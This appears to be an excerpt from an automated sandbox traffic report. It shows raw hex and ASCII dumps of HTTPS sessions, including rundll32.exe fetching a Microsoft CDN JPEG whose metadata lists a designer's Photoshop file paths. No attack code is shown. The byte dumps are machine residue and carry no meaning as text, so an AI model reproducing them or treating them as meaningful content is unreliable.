                                                                                                                                                                                    2023-01-05 07:58:11 UTC6445INData Raw: ca 7d dd 9e 6a ea f3 e5 c0 1b ae c6 53 d3 cc 18 97 57 3d 8d fe de ca eb 3e 61 ff 00 90 21 cb 8c e3 9c 18 49 95 c8 e0 ec 1f 5a 9a e9 be 5f d5 39 5c 0a 76 ac ce d5 59 f2 9a cd 8b 32 64 cc 98 15 7a 75 76 50 7d 35 1f e9 84 7f 18 a4 e8 fa 7c 84 64 cd b7 18 7c d9 7d 3c 40 cf a8 cb 7e e3 6d 5a 5f 5b 26 0e 93 e6 dd 3b 32 75 0b 9f a8 44 67 65 3f 87 b7 1e 48 8f 51 7f 97 6f 7a be 65 97 a6 e9 c6 1c 47 a2 ea 31 e7 2a f2 bb 18 77 b6 ed f1 b4 77 92 91 fa 04 1e 83 ff 00 a6 ed c8 99 32 79 fb d4 5b a1 1b 91 e1 85 bb a7 de 10 6f b7 75 2e 6e a0 a1 c7 b4 ae 31 20 40 53 6d a0 79 90 d1 7c cf b9 a0 0e 67 f5 d2 8c 6c c9 72 72 06 96 47 3e 4e e7 bd e4 a6 ca 9b ba 13 97 09 60 a6 5c 26 75 1d ec 7e f7 a5 98 ff 00 a6 de 4a 70 c2 db 69 98 1b 4d a9 7a 40 00 19 19 57 79 36 5d c7 5a c2 30
                                                                                                                                                                                    Data Ascii: }jSW=>a!IZ_9\vY2dzuvP}5|d|}<@~mZ_[&;2uDge?HQozeG1*ww2y[ou.n1 @Smy|glrrG>N`\&u~JpiMz@Wy6]Z0
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6461INData Raw: c6 00 3b 48 00 37 18 b6 ea de 57 78 10 92 2f 04 0d 3d 94 6f b5 c4 40 a7 39 f1 fa 88 a4 5a 48 91 fc b7 a5 c8 60 fa a6 56 34 03 97 b6 91 7d 35 53 b4 8d c3 cd 7d 5a 8a b0 bf ef ad 6e 0e b4 ae 84 a8 0a ab f6 0a ea 3a 35 00 a7 51 12 48 06 e3 4a 5e b3 10 51 97 19 dc 08 17 9a 6e a1 d4 26 52 6e 56 c3 ec a0 d9 23 72 88 06 00 d3 4a 71 d4 e1 6c bd 53 0e e9 0d 02 41 be e5 e2 bb 6a 31 03 24 d8 51 5e a4 6c 68 04 03 7b 54 ad 0d da f1 3a d6 4c 99 54 9d bb 04 0e 22 7b da d4 3c e2 c3 06 02 dc cf 96 d4 7a 4c 4c bb 14 ee 9d 24 f2 f7 89 15 e8 b6 51 ea 33 08 51 a1 91 12 a7 eb a7 e9 a6 30 96 83 1a 31 14 23 49 a2 6e 39 50 1c be 90 78 d4 f6 d0 db 57 fe 84 6b f4 4d 1c 7d 0e 33 95 94 6e 68 81 03 99 26 8e 3c 8b 04 1b d0 c6 80 95 e2 47 0a 39 88 dd 87 76 cd e2 e2 79 1a c5 d7 32 6c e9
                                                                                                                                                                                    Data Ascii: ;H7Wx/=o@9ZH`V4}5S}Zn:5QHJ^Qn&RnV#rJqlSAj1$Q^lh{T:LT"{<zLL$Q3Q01#In9PxWkM}3nh&<G9vy2l
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6504INData Raw: dc fc d5 f8 84 63 50 37 05 c6 bb 43 4f 06 db 49 89 31 9f 4c a8 2c 18 9f 10 b9 fb b5 eb 74 98 f7 4a 77 cb 02 57 71 d4 2f dd f8 ab 73 03 dd 16 22 2c 3d d5 a4 cb 9d c3 ef 9c ae c4 de 4f fd 4f 33 52 74 b9 77 6c b6 a0 05 25 45 bb 7b b4 59 24 e9 3f 78 08 b5 6e ca 18 e4 e6 68 0c 72 d9 5a 04 9d 09 35 e8 e4 53 8d 81 b4 e9 13 ca 9b 20 5d ba eb 61 f5 4d 36 63 b1 ba 85 50 c8 0b 0b 13 a5 1c 93 e0 04 cb 2d ef dd fb 29 b1 60 ee fa a3 f1 24 6b 7e eb 0f b6 99 5e 10 91 ba e2 05 fc db 68 26 63 ea 32 24 03 30 47 b3 fc d4 10 82 54 91 de 1c fd de f5 36 5c d8 dc 38 c7 ea 06 60 02 ec 3e 18 51 de dd f1 d2 e3 7c 6c 32 ac 82 46 a6 fe 23 3f 0d 1e a3 a3 63 91 34 21 ac cb f5 72 ad c4 8b 9d 2a 38 56 95 24 eb f4 db fa 16 ac 9d 59 11 8b 08 dd 73 13 ec dd 58 db 1a b2 e4 20 1c 86 2c a6 7c
                                                                                                                                                                                    Data Ascii: cP7COI1L,tJwWq/s",=OO3Rtwl%E{Y$?xnhrZ5S ]aM6cP-)`$k~^h&c2$0GT6\8`>Q|l2F#?c4!r*8V$YsX ,|
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6576INData Raw: 1e 37 e2 6b 27 53 8d 4e 56 6c 4b e9 6f 37 42 de 2c a7 ca 5a 3b bb 69 71 e5 68 c5 33 a5 bf 43 59 db 03 01 9d 54 1d b6 00 a8 b4 27 c5 40 e0 ca 30 f5 8e 88 0e 0b ce 46 12 a7 20 f2 2f 77 c7 48 98 ed 9a 21 fe f0 e3 49 f3 17 44 4e 9c 30 c6 ea 1b bc 4c 78 8a f8 87 a9 ef 51 c9 d3 6e da 4c ed 37 31 db 41 3a 70 5d db ca 05 eb 61 58 c8 a6 08 3f be 9f 0e 38 0d 02 e2 c2 de 5f ae 8c c8 1c a8 09 81 30 68 65 19 15 99 8c aa 8d 48 f7 aa 34 ae 75 df 1c 2a 52 f6 9a 7d e4 87 1e 1e 5f 5d 6d 93 2c 20 d2 6f 20 e4 80 58 0d 20 d7 e6 fa 70 5b 1d 83 01 e5 3e eb 7f cd 5e 9a d8 52 f5 9d 49 23 1a 10 40 9b b1 1a 5a bf 32 c0 26 36 26 14 68 28 ab 3e d8 d0 d6 d6 69 59 98 8e 35 df 1b 92 e4 8a 38 54 c8 91 04 ea 23 85 14 24 6c d4 83 c6 b6 a9 0a a9 7b fe ea 5c 42 4e 47 9d 2f 00 d0 4c 60 b3 93
                                                                                                                                                                                    Data Ascii: 7k'SNVlKo7B,Z;iqh3CYT'@0F /wH!IDN0LxQnL71A:p]aX?8_0heH4u*R}_]m, o X p[>^RI#@Z2&6&h(>iY58T#$l{\BNG/L`
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6592INData Raw: c7 1a 64 5c ab de c9 6f 23 6e a5 ca ab 2e 08 21 87 11 5d 37 57 85 83 e3 ea 31 8c 8c 11 4b 6c 8b 77 f6 f1 ee d6 3e af 02 2e 1e 9f a8 c6 00 2b 20 34 7f b9 7f 7a 87 53 d2 66 5c 2c 4e cc 86 64 b8 6d 17 d3 f3 8f 2d 1f 5c 7e 4f ab 3b a6 6f 89 b9 08 f1 62 7f ee 56 5f 97 75 88 de 9f 50 01 56 0c 36 ef 4f 06 45 61 dd 6d e9 dc ac 7d 06 27 6c 68 ec ce e0 71 f2 85 6f 7a 8b fc b7 23 a7 5c 81 99 36 12 18 ed b9 82 34 6d b4 73 75 0c c7 29 90 14 ff 00 8b 77 f8 a9 00 00 85 00 98 b5 0c 8c 22 40 68 f6 d3 33 de 44 09 16 1e ca e9 fa 53 e7 75 52 47 02 4c 4f f2 d7 fd bd 5d dc ae 34 2c ef 72 d2 3c 6b f0 b5 1c b9 9d 46 40 21 44 45 87 bd 49 99 10 b9 04 15 b7 11 71 6a 6e a3 af 5d f9 99 a5 ed 04 9e 35 f9 9e 99 76 64 46 0e 9c 76 95 3b 86 b4 f9 73 e4 1e a6 42 cc 4e 82 4f 78 ee f6 d1 c4
                                                                                                                                                                                    Data Ascii: d\o#n.!]7W1Klw>.+ 4zSf\,Ndm-\~O;obV_uPV6OEam}'lhqoz#\64msu)w"@h3DSuRGLO]4,r<kF@!DEIqjn]5vdFv;sBNOx
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6596INData Raw: 5a 19 f3 c8 c4 dd e0 4f 19 ff 00 96 86 35 4f 53 28 0c 5e 6d 7f 82 97 0e 02 31 45 cb 0d 6f da 28 e6 68 cd 91 c5 a7 bd f5 d0 ce e5 61 4e 87 5b d0 ea f3 e4 83 aa aa 9b c4 58 fd b4 ca 09 67 63 a8 32 00 ec a6 45 11 22 e6 75 ec a0 84 c4 70 ad a3 4e 34 a9 89 64 b7 76 05 c9 ac 7d 36 55 19 33 13 05 4c f7 49 3e e9 e4 29 9d cc 2d b6 1c 62 03 05 e3 bc 5a 7d e5 a5 e9 b1 12 d8 d5 83 90 74 6d d3 0d 07 b6 9d 76 17 5c 67 6e 45 6b 4c f6 8f 0d 15 c5 23 7a 80 59 c0 6f 48 f6 2b 78 f7 af bd 4a b9 d5 5c 2a 9c a0 e4 3b 67 69 d1 87 16 6a 0a 46 d4 2e 4e 46 5b da 67 76 df f9 6b 08 e9 8a 33 45 b6 88 2c 67 db e3 6f 76 bf 29 d4 48 cb 69 50 0c a8 1a f7 49 f2 f9 a8 bb 05 0a eb 00 11 67 1c 1a 8a b6 22 e8 22 c0 46 9e e9 af 43 ab 66 c7 84 82 49 0b 2c 22 ea 8b f5 f9 a8 f4 5d 06 34 51 90 85
                                                                                                                                                                                    Data Ascii: ZO5OS(^m1Eo(haN[Xgc2E"upN4dv}6U3LI>)-bZ}tmv\gnEkL#zYoH+xJ\*;gijF.NF[gvk3E,gov)HiPIg""FCfI,"]4Q
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6636INData Raw: e2 64 38 d7 1c f7 84 41 11 7f bb b6 b2 fa a8 cc b9 01 82 57 45 1f fa a8 74 83 16 3c 79 15 76 9c 80 40 fe aa 74 2a 5d 8f 05 30 a5 a9 7a 7c 0a ac 72 b8 7c cc 44 c1 5b 22 ab 7d 7d ea 67 cc e1 b2 3a ea 4d b5 e5 f0 8f 05 03 85 f2 26 30 76 62 68 92 09 3a e4 34 7a 75 d9 8f 28 45 2c 03 ee dc 63 bd 93 f5 ff 00 2d 3f 47 d4 ae 46 cc db 4e 37 00 1d b3 ef cf f7 69 db a9 64 4c cd b1 a5 da d6 f1 1d 9e 7d fe ed 64 c8 c9 0c ed a8 02 23 84 1f 2c 8f 2d 1f 45 48 0c 2c a4 82 c3 cd e5 b5 65 c1 93 14 b3 e3 2a 81 8f 85 bd f4 f8 e9 5b d4 29 99 01 5d e2 c7 6c 5c 37 d5 58 17 aa c2 c8 b9 31 63 7d 21 ac 3b ac 8d ee bf 8a b1 9c 4c 08 85 66 72 be 7d 6e cb ad 34 ba 2b 8d ad b4 7b a4 4f 74 9d 05 2e 45 c6 8e 3a 76 57 2f c6 c2 14 2b 54 e5 cb f9 47 25 87 a8 c3 78 91 36 d8 3d e6 ee d6 4e a7
                                                                                                                                                                                    Data Ascii: d8AWEt<yv@t*]0z|r|D["}}g:M&0vbh:4zu(E,c-?GFN7idL}d#,-EH,e*[)]l\7X1c}!;Lfr}n4+{Ot.E:vW/+TG%x6=N


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    33192.168.2.44973580.67.82.211443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:10 UTC534OUTGET /cms/api/am/imageFileData/RE57dh2?ver=2fad HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                                                    Host: img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2023-01-05 07:58:10 UTC822INHTTP/1.1 200 OK
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Last-Modified: Wed, 28 Dec 2022 18:24:37 GMT
                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                    X-ActivityId: a1279bb8-aa18-4b22-bcec-6cf6908818e8
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                    Content-Location: https://image.prod.cms.rt.microsoft.com/cms/api/am/imageFileData/RE57dh2?ver=2fad
                                                                                                                                                                                    X-Source-Length: 1746428
                                                                                                                                                                                    Content-Length: 1746428
                                                                                                                                                                                    Cache-Control: public, max-age=167150
                                                                                                                                                                                    Expires: Sat, 07 Jan 2023 06:24:00 GMT
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:58:10 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2023-01-05 07:58:10 UTC823INData Raw: ff d8 ff e1 1a 66 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0e a6 00 00 00 27 10 00 0e a6 00 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 31 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 31 36 20 31 35 3a 30 37 3a 34 31 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
                                                                                                                                                                                    Data Ascii: fExifMM*bj(1r2i''Adobe Photoshop 21.1 (Windows)2022:09:16 15:07:418"
                                                                                                                                                                                    2023-01-05 07:58:10 UTC854INData Raw: 27 e8 ec b3 fe 1d 52 c3 e9 58 b9 b8 15 37 a6 39 d4 e4 b1 c5 c5 99 36 b8 90 d6 ef a1 f5 d1 8d 8d 4f da 32 19 fa 3f 47 f9 77 7f da 7f 4d 75 5f b1 70 98 77 50 d0 0b 8c d8 2f 07 21 af 03 de d1 b2 f7 7b 76 dd fa 6f 6a cc ce c7 c8 ae fc af d1 0b 58 e1 55 67 ec e5 d5 3d f7 3f 76 cf 47 d4 b1 bb ae a9 8e ff 00 49 fa 6b 2c fd 17 f8 54 c9 e3 94 4f ca 35 3b fd 3f c6 48 36 e4 e4 63 61 5f d3 99 6e 66 5b 9f 9b 6b 6c c8 36 35 f1 6d b7 5b b2 b6 56 c7 38 6c db 8e ff 00 53 d4 aa a6 65 fa b5 d7 e9 ff 00 39 6f a6 b3 3a 7d dd 43 1e ad cf a9 de 83 da 4d a2 b9 d9 21 db 98 dc d0 c0 eb 1c d6 be bf 57 1e af 53 f5 7f f0 3f a3 7d 95 ae 93 f6 4d d9 b8 f8 b7 58 e3 92 1f 63 18 cb 84 b8 d0 ca de d7 39 96 63 d7 e8 55 ee f4 bd 3f 52 af d2 55 ff 00 5c 40 ea 5f 51 f3 37 d9 6f 4b cd f7 d8 f7
                                                                                                                                                                                    Data Ascii: 'RX796O2?GwMu_pwP/!{vojXUg=?vGIk,TO5;?H6ca_nf[kl65m[V8lSe9o:}CM!WS?}MXc9cU?RU\@_Q7oK
                                                                                                                                                                                    2023-01-05 07:58:10 UTC870INData Raw: 2d 4f 6c 79 6d 70 69 63 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 37 38 38 30 38 36 30 37 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 30 54 31 35 3a 34 32 3a 31 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 2d 4f 6c 79 6d 70 69 63 73 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 42 69 6e 67 2d 4f 6c 79 6d 70 69 63 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 39 30 37 31 39 36 33 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 30 54 31 35 3a 34 34 3a 31 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c
                                                                                                                                                                                    Data Ascii: -Olympics_GettyImages-78808607_1080x1920.jpg saved&#xA;2016-07-20T15:42:12-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Bing-Olympics\Chosen\Crops\Bing-Olympics_GettyImages-179071963_1080x1920.jpg saved&#xA;2016-07-20T15:44:12-07:00&#x9;File C:\Users\v-l
                                                                                                                                                                                    2023-01-05 07:58:10 UTC945INData Raw: 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 30 3a 35 35 3a 32 33 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 43 72 6f 70 73 5c 45 64 67 65 2d 4c 69 66 65 73 74 79 6c 65 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 39 30 36 37 35 33 35 33 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 37 2d 32 36 54 31 30 3a 35 37 3a 32 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 45 64 67 65 5c 5f 43 72 6f 70 73 5c 45 64 67 65 2d 4c 69 66 65 73 74 79 6c 65 5f
                                                                                                                                                                                    Data Ascii: 080x1920.jpg saved&#xA;2016-07-26T10:55:23-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_Crops\Edge-Lifestyle_GettyImages-490675353_1080x1920.jpg saved&#xA;2016-07-26T10:57:29-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Edge\_Crops\Edge-Lifestyle_
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1350INData Raw: 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 38 2d 33 30 54 31 32 3a 35 35 3a 31 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 36 2d 30 38 2d 33 31 54 31 33 3a 31 39 3a 34 30 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30
                                                                                                                                                                                    Data Ascii: kscreen_1080x1920_Portrait.psd saved&#xA;2016-08-30T12:55:16-07:00&#x9;File Lockscreen_1080x1920_Portrait.psd opened&#xA;2016-08-31T13:19:40-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Lockscreen_1080x1920
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1485INData Raw: 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 54 68 61 6e 6b 73 67 69 76 69 6e 67 5c 4d 49 54 2d 54 68 61 6e 6b 73 67 69 76 69 6e 67 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 34 35 38 36 35 30 36 33 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 30 2d 31 34 54 31 33 3a 31 33 3a 32 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74
                                                                                                                                                                                    Data Ascii: v-lizagh\MS\Windows10\MomentsInTime\Thanksgiving\MIT-Thanksgiving_GettyImages-545865063_1080x1920.jpg saved&#xA;2016-10-14T13:13:27-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Lockscreen_1080x1920_Portrait
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1509INData Raw: 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 30 37 54 31 30 3a 32 33 3a 31 39 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4a 61 70 61 6e 5c 5f 43 48 4f 53 45 4e 5c 4a 61 70 61 6e 46 65 65 64 62 61 63 6b 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 39 35 37 32 37 33 31 30 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 30 37 54 31 30 3a 32 34 3a 33 34 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52
                                                                                                                                                                                    Data Ascii: saved&#xA;2016-11-07T10:23:19-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Japan\_CHOSEN\JapanFeedback_GettyImages-95727310_1080x1920.jpg saved&#xA;2016-11-07T10:24:34-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoR
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1601INData Raw: 53 6e 61 70 45 6e 68 61 6e 63 65 6d 65 6e 74 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 37 36 38 37 31 32 31 37 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 31 31 54 31 30 3a 35 39 3a 31 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 45 64 67 65 2d 54 61 73 6b 56 69 65 77 5f 67 72 61 64 69 65 6e 74 5f 35 30 30 70 78 2d 31 32 31 31 39 30 33 39 35 5f 31 30 38 30 78 31 39 32 30 35 32 34 42 42 33 34 39 42 34 33 43 42 45 33 32 30 46 46 42 45 38 34 36 38 30 36 38 37 45
                                                                                                                                                                                    Data Ascii: SnapEnhancements_GettyImages-676871217_1080x1920.jpg saved&#xA;2017-01-11T10:59:18-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Edge-TaskView_gradient_500px-121190395_1080x1920524BB349B43CBE320FFBE84680687E
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2080INData Raw: 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 32 2d 32 32 54 31 30 3a 34 37 3a 30 36 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 53 70 72 69 6e 67 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 4d 61 72 63 68 5c 43 48 4f 53 45 4e 5c 4d 49 54 2d 53 70 72 69 6e 67 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5f 4d 61 72 63 68 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 31 35 30 37 32 31 39 32 5f 31 30 38 30 78 31 39 32 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 32 2d 32 32 54 31 30 3a 34 37 3a 35 30 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53
                                                                                                                                                                                    Data Ascii: opened&#xA;2017-02-22T10:47:06-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\SpringEntertainment\March\CHOSEN\MIT-SpringEntertainment_March_GettyImages-515072192_1080x1920.psd saved&#xA;2017-02-22T10:47:50-08:00&#x9;File C:\Users\v-lizagh\MS
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2128INData Raw: 38 30 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 30 36 54 31 33 3a 34 30 3a 30 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 30 37 54 31 31 3a 30 31 3a 34 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 69 63 72 6f 73 6f 66 74 5c 4d 61 6b 65 57 68 61 74 73 4e 65 78 74 5c 43 48 4f 53 45 4e 5c 4d 53 2d 4d 61 6b 65 57 68 61 74 73 4e 65 78 74 5f 47 65 74 74
                                                                                                                                                                                    Data Ascii: 80_1080x1920.jpg saved&#xA;2017-03-06T13:40:08-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-03-07T11:01:48-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Microsoft\MakeWhatsNext\CHOSEN\MS-MakeWhatsNext_Gett
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2207INData Raw: 30 3a 33 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 42 69 6e 67 41 74 57 6f 72 6b 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 33 37 31 34 34 32 39 33 5f 31 30 38 30 78 31 39 32 30 30 39 39 45 36 30 37 34 41 43 31 42 42 33 35 41 31 34 38 39 37 31 46 39 34 30 45 42 30 41 30 44 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 31 32 54 31 35 3a 35 38 3a 33 30 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42
                                                                                                                                                                                    Data Ascii: 0:35-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_BingAtWork_GettyImages-137144293_1080x1920099E6074AC1BB35A148971F940EB0A0D.psb saved&#xA;2017-04-12T15:58:30-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\B
